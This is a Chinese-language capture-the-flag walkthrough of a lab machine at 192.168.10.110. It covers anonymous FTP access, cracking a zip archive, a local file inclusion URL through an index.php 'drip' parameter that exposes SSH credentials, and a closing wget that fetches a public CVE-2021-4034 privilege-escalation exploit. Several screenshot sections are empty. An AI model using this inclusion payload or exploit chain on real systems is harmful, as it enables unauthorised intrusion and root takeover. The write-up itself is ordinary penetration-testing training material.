信息收集：

Nmap:

存活：

靶机ip：192.168.10.110

端口：

服务：

发现ftp服务可以匿名登录。且用户名是FTP。

发现一个压缩包，下载并爆破。

得到密码 072528035。发现关键字 drip。里面还有一个 secret.zip(秘密)。

Web:

发现俩可疑用户名。 travisscott & thugger

目录扫描：

发现 robots.txt 看看内容。

发现俩目录，访问看看。

没啥用 上面的目录还不能访问，我们去fuzz测试一下。

这边一直爆200 我也不知道啥问题，，，

关键字应该是 压缩包的txt 内容 drip 。

猜测是文件包含漏洞。

url: http://192.168.10.110/index.php?drip=/etc/dripispowerful.html

发现密码

得到用户名密码 thugger/imdrippinbiatch。

提权：

ssh登录上去后，上传提权检测脚本文件。

靶机执行该文件：

下载检测出来的提权脚本。

发现靶机没有gcc,不能进行编译，，，换个python脚本。

wget https://github.com/nikaiw/CVE-2021-4034/archive/refs/heads/master.zip